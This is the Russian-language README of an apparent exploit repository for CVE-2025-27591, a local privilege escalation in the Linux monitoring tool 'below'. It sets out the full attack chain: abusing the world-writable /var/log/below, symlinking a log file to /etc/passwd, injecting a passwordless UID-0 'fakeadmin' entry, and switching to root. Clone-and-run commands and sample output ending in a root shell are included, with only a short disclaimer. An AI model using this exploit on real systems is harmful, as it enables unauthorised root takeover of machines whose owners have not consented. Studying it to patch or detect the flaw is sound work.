
🔥 Эксплойт локального повышения привилегий для CVE-2025-27591 | Злоупотребляет общедоступным каталогом журналов в Below для получения root через инъекцию в /etc/passwd
below🛑 Отказ от ответственности: Данный эксплойт предоставлен только для образовательных целей и авторизованного тестирования безопасности. Несанкционированное использование может быть незаконным.
below — это инструмент мониторинга производительности, разработанный Facebook для Linux-систем. Версии below до исправленного релиза подвержены критической уязвимости, которая позволяет непривилегированным пользователям повысить свои привилегии до root, используя общедоступные для записи каталоги журналов и небезопасную обработку логов.
Этот Bash-скрипт выполняет следующие действия:
Проверка общедоступного для записи каталога:
/var/log/below доступен для записи всем (красный флаг).Подготовка атаки через симлинк:
error_root.log (если есть) и создаёт символическую ссылку на /etc/passwd.Формирование полезной нагрузки:
/etc/passwd:
fakeadmin::0:0:fakeadmin:/root:/bin/bash
Запуск записи логов:
sudo below record, чтобы заставить уязвимый бинарник записать логи.Получение root-доступа:
su fakeadmin для получения root-оболочки без запроса пароля.CVE-2025-27591/
├── exploit.sh
├── README.md
Перед запуском эксплойта убедитесь, что у вас есть:
/usr/bin/below/var/log/belowsudo для выполнения: sudo below recordln (создание симлинков)su (переключение пользователей)timeout (контроль времени выполнения)whoami (проверка привилегий)# 1. Клонируйте репозиторий
git clone https://github.com/00xCanelo/CVE-2025-27591.git
cd CVE-2025-27591
# 2. Сделайте скрипт исполняемым
chmod +x exploit.sh
# 3. Запустите эксплойт
./exploit.sh
[*] Checking for CVE-2025-27591 vulnerability...
[+] /var/log/below is world-writable.
[!] Found existing log file: removing it...
[+] Created symlink: /var/log/below/error_root.log -> /etc/passwd
[*] Writing malicious line to /tmp/fakeadmin
[*] Triggering logging via 'sudo below record'...
[+] 'below record' executed (or timed out)
[*] Attempting to write payload to /etc/passwd via symlink...
[+] Payload successfully appended.
[*] Trying to switch to root shell using 'su fakeadmin'...
root@target:/# whoami
root
| Поле | Значение |
|---|
| CVE-ID | CVE-2025-27591 |
| Критичность | 🔥 Критическая (CVSS ≈ 7.8 - 8.8) |
| Вектор атаки | Локальный |
| Воздействие | Повышение привилегий до root (UID=0) |
| Тип эксплойта | Злоупотребление симлинками / Инъекция в файлы журналов |
| Уязвимое приложение | below – обычно устанавливается как /usr/bin/below |
| Корневая причина | Небезопасная запись в файлы в /var/log/below/ без проверки прав доступа |